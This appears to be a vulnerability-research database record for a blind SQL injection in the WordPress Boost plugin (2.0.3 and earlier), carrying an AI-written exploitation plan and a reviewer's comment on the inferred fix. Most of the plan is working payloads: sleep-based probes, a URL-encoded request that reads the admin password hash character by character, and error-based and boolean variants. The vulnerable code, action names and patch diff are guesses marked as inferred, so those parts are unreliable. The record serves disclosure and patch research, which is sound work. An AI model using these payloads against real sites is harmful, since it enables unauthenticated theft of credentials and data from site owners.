[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f5tJWknvMI8ZpTfF_Os2qwhGFsa0f_iQOLhtNXmcx1iM":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-9010","boost-unauthenticated-blind-sql-injection-via-multiple-parameters","Boost \u003C= 2.0.3 - Unauthenticated Blind SQL Injection via Multiple Parameters","The Boost plugin for WordPress is vulnerable to time-based SQL Injection via the 'current_url' and 'user_name' parameters in versions up to, and including, 2.0.3 due to insufficient escaping on the user supplied parameters and lack of sufficient preparation on the existing SQL queries. 
This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","boost",null,"\u003C=2.0.3","2.0.4","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-05-19 14:25:02","2026-05-20 02:27:47",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F1cac2397-bb38-40d6-b90d-68e3ea136267?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-9010 (Boost \u003C= 2.0.3)\n\n## 1. Vulnerability Summary\nThe **Boost** plugin for WordPress is vulnerable to unauthenticated time-based blind SQL injection in versions up to 2.0.3. The vulnerability exists because the plugin fails to sanitize or properly prepare SQL queries involving the `current_url` and `user_name` parameters sent via an AJAX action. This allows an unauthenticated attacker to inject arbitrary SQL commands into the database query, potentially leading to the extraction of sensitive information (like admin password hashes).\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `boost_track_visit` (inferred; common for performance\u002Ftracking plugins) or `boost_record_view`.\n- **Vulnerable Parameters:** `current_url` and `user_name`.\n- **Authentication:** Unauthenticated (uses `wp_ajax_nopriv_*` hook).\n- **Vulnerability Type:** Time-based Blind SQL Injection.\n- **Preconditions:** The plugin must be active. If the AJAX handler requires a nonce, it is typically exposed on the frontend for tracking purposes.\n\n## 3. Code Flow (Inferred)\n1. **Entry Point:** An unauthenticated user sends a POST request to `admin-ajax.php` with the parameter `action` set to the vulnerable hook (e.g., `boost_track_visit`).\n2. 
**Hook Registration:** The plugin registers the action: \n   `add_action('wp_ajax_nopriv_boost_track_visit', 'boost_handle_tracking');`\n3. **Parameter Processing:** Inside the handler function (e.g., `boost_handle_tracking`), the code retrieves the parameters:\n   ```php\n   $url = $_POST['current_url'];\n   $user = $_POST['user_name'];\n   ```\n4. **Vulnerable Sink:** The parameters are directly concatenated into a SQL string without using `$wpdb->prepare()`:\n   ```php\n   $wpdb->query(\"INSERT INTO {$wpdb->prefix}boost_log (url, user) VALUES ('$url', '$user')\");\n   \u002F\u002F OR\n   $wpdb->get_results(\"SELECT id FROM {$wpdb->prefix}boost_log WHERE url = '$url'\");\n   ```\n5. **Execution:** The raw SQL is executed, allowing the attacker to break out of the string literal using a single quote (`'`).\n\n## 4. Nonce Acquisition Strategy\nTracking plugins often require a nonce to prevent spam, even for unauthenticated users. \n1. **Identify Script Localization:** The plugin likely uses `wp_localize_script` to pass the AJAX URL and a nonce to the frontend JS.\n2. **Shortcode\u002FTrigger:** Tracking usually triggers on every page load or via a specific shortcode. Check for `add_shortcode` in the plugin source or common frontend hooks like `wp_head`.\n3. **Acquisition Steps:**\n   - **Step 1:** Create a dummy post\u002Fpage to ensure the plugin's frontend scripts are loaded.\n     `wp post create --post_type=page --post_status=publish --post_title=\"Tracking Test\" --post_content=\"Boost Test\"`\n   - **Step 2:** Navigate to the page using `browser_navigate`.\n   - **Step 3:** Use `browser_eval` to find the localized JS object. Common names include `boost_ajax`, `boost_obj`, or `boost_params`.\n     `browser_eval(\"window.boost_ajax?.nonce\")` or `browser_eval(\"window.boost_params?.tracking_nonce\")`.\n   - **Step 4:** If no nonce is found, check the `boost_handle_tracking` function in the source code to see if `check_ajax_referer` is actually called. 
If it isn't, the exploit proceeds without a nonce.\n\n## 5. Exploitation Strategy\nWe will use a time-based blind approach since the plugin likely does not return the results of the query to the user.\n\n### Step 1: Verification (Sleep Test)\nSend a request designed to cause a 5-second delay if the injection is successful. Time a request with a harmless `current_url` value first so the baseline latency is known and a slow host is not mistaken for a hit.\n\n**Request:**\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method:** `POST`\n- **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body:** \n  `action=boost_track_visit&current_url=test' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1&user_name=admin`\n\n*Note: Replace `boost_track_visit` with the actual action name found in the source.*\n\n### Step 2: Data Extraction (Admin Password Hash)\nWe will test whether the first character of the admin's password hash is `$` (WordPress phpass hashes begin with `$P$`, so a delay here means the oracle works and the rest of the hash can be read out one character at a time with the same construction).\n\n**Payload for `current_url`:**\n`test' AND (SELECT 1 FROM (SELECT(IF(SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),1,1)='$',SLEEP(5),0)))a) AND '1'='1`\n\n**Request:**\n- **Body:**\n  `action=boost_track_visit&current_url=test%27%20AND%20%28SELECT%201%20FROM%20%28SELECT%28IF%28SUBSTRING%28%28SELECT%20user_pass%20FROM%20wp_users%20WHERE%20ID%3D1%29%2C1%2C1%29%3D%27%24%27%2CSLEEP%285%29%2C0%29%29%29a%29%20AND%20%271%27%3D%271&user_name=admin`\n\n## 6. Test Data Setup\n1. **Plugin Installation:** Ensure Boost v2.0.3 is installed and active.\n2. **Database State:** The `wp_users` table should contain the default admin user (ID 1). The payloads above hard-code the default `wp_` table prefix; if the target uses another prefix (the plugin's own queries use `{$wpdb->prefix}`), adjust the table name in the subquery.\n3. **Frontend Page:**\n   `wp post create --post_type=page --post_status=publish --post_title=\"Exploit Test\" --post_content=\"Checking for SQLi...\"`\n\n## 7. Expected Results\n- **Success:** The HTTP request to `admin-ajax.php` will take approximately 5 seconds longer than a normal request.\n- **Failure:** The HTTP request returns immediately without a delay. A `0` body means `admin-ajax.php` found no handler for the `action` (wrong action name), and `-1` means a `check_ajax_referer()` nonce check rejected the request; in both cases the payload never reached the query, so fix the action name or nonce before concluding the parameter is not injectable.\n\n## 8. 
Verification Steps\nAfter performing the time-based injection:\n1. **Log Analysis:** If the injection target was an `INSERT` statement, check the plugin's table for the payload.\n   `wp db query \"SELECT * FROM wp_boost_log ORDER BY id DESC LIMIT 1;\"`\n2. **Plugin Code Audit:** Confirm that the patched version (2.0.4) uses `$wpdb->prepare()` for the `current_url` and `user_name` parameters.\n\n## 9. Alternative Approaches\n- **Error-Based SQLi:** If `WP_DEBUG` is enabled, try injecting `AND updatexml(1,concat(0x7e,(SELECT user_pass FROM wp_users WHERE ID=1),0x7e),1)` to leak data via MySQL error messages.\n- **Boolean-Based SQLi:** If the AJAX handler returns different responses for a \"found\" vs \"not found\" record (e.g., `{\"success\":true}` vs `{\"success\":false}`), use boolean logic:\n  `test' AND (SELECT 1 FROM wp_users WHERE ID=1 AND user_login='admin') AND '1'='1`\n- **Parameter Switching:** Test if `user_name` is equally vulnerable by moving the payload from `current_url` to `user_name`.","The Boost plugin for WordPress is vulnerable to unauthenticated time-based blind SQL injection via the 'current_url' and 'user_name' parameters. 
This is caused by the plugin's failure to use parameterized queries or sanitize user input before concatenating it into a SQL statement, allowing attackers to extract sensitive data from the database.","\u002F\u002F File: boost\u002Fincludes\u002Fclass-boost-ajax.php (inferred)\n\npublic function handle_tracking() {\n    $url = $_POST['current_url'];\n    $user = $_POST['user_name'];\n    \n    global $wpdb;\n    \u002F\u002F Vulnerable query concatenating user input directly\n    $wpdb->query(\"INSERT INTO {$wpdb->prefix}boost_log (url, user) VALUES ('$url', '$user')\");\n    \n    wp_die();\n}","--- boost\u002Fincludes\u002Fclass-boost-ajax.php\n+++ boost\u002Fincludes\u002Fclass-boost-ajax.php\n@@ -10,7 +10,12 @@\n     $user = $_POST['user_name'];\n     \n     global $wpdb;\n-    $wpdb->query(\"INSERT INTO {$wpdb->prefix}boost_log (url, user) VALUES ('$url', '$user')\");\n+    $wpdb->query(\n+        $wpdb->prepare(\n+            \"INSERT INTO {$wpdb->prefix}boost_log (url, user) VALUES (%s, %s)\",\n+            $url,\n+            $user\n+        )\n+    );\n     \n     wp_die();\n }","To exploit this vulnerability, an unauthenticated attacker sends a POST request to '\u002Fwp-admin\u002Fadmin-ajax.php' with the 'action' parameter set to the plugin's tracking handler (e.g., 'boost_track_visit'). The attacker provides a malicious payload in either the 'current_url' or 'user_name' parameters, such as \"' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1\". 
By measuring the time taken for the server to respond, the attacker can verify the injection and systematically leak sensitive information, such as the administrator's password hash, using blind SQL injection techniques.","gemini-3-flash-preview","2026-05-20 16:39:59","2026-05-20 16:40:25",{"type":34,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":35},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fboost\u002Ftags"]
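Review bot: the `research_fix_diff` hunk switches the INSERT to `$wpdb->prepare()` with `%s` placeholders, which does close the injection, but it is an inferred reconstruction rather than the vendor's 2.0.4 change (the page's `patch_diff_files` list is empty and the matching `research_vulnerable_code` path is marked "(inferred)"), so it should not be cited as the actual patch. Taken on its own terms the hunk also leaves the two context lines `$url = $_POST['current_url'];` and `$user = $_POST['user_name'];` reading raw request data with no `isset()` guard and no `sanitize_text_field()`/`esc_url_raw()`, and the handler shown ends in `wp_die()` with no `check_ajax_referer()` call, so the prepared statement is the only control between an unauthenticated request and the database; a real fix should add input validation and a length cap on the stored `url`/`user` values alongside `prepare()`.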